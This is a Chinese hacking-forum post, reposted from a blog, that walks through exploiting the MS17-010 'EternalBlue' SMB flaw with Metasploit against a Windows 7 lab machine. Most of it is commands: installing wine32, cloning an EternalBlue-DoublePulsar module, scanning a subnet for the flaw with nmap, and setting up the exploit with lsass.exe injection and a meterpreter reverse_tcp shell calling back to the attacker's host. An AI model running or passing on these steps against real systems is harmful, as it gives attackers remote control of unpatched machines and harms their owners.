跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

MSF框架实现“永恒之蓝”ms17-010的exp攻击


Ken1Ve

推荐的帖子

其实我们这里所说的使用MSF 实现 “永恒之蓝”的快速攻击,就是利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。我这里简单的记录下整个攻击利用所需要的工具准备、利用过程以及后渗透的一些简单内容。

本次用到的环境:

kali系统.ip地址:192.168.1.106

目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.102

具体的步骤如下:

kali系统下安装wine32:

dpkg --add-architecture i386 && apt-get update &&apt-get install wine32

git clone下载其利用脚本

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb

cd    Eternalblue-Doublepulsar-Metasploit/
cp  -r  deps/  eternalblue_doublepulsar.rb    /usr/share/metasploit-framework/modules/exploits/windows/smb

nmap漏洞指定扫描:

nmap -n -p445 --script smb-vuln-ms17-010 192.168.0.0/24 --open

启动msf,然后进行一系列设置:

service postgresql start
msfconsole
search  eternalblue
use  exploit/windows/smb/eternalblue_doublepulsar

进行攻击载荷的配置工作:

set  DOUBLEPULSARPATH  /usr/share/metasploit-framework/modules/exploits/windows/smb/deps     
set  ETERNALBLUEPATH   /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set  PROCESSINJECT   lsass.exe
set  TARGETARCHITECTURE  x64
set  rhost  192.168.1.102
show targets
set  target 8
set  payload windows/x64/meterpreter/reverse_tcp
show options
set  lhost 192.168.1.106
exploit

效果如下

QQ截图20180508135850.png


版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/115.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...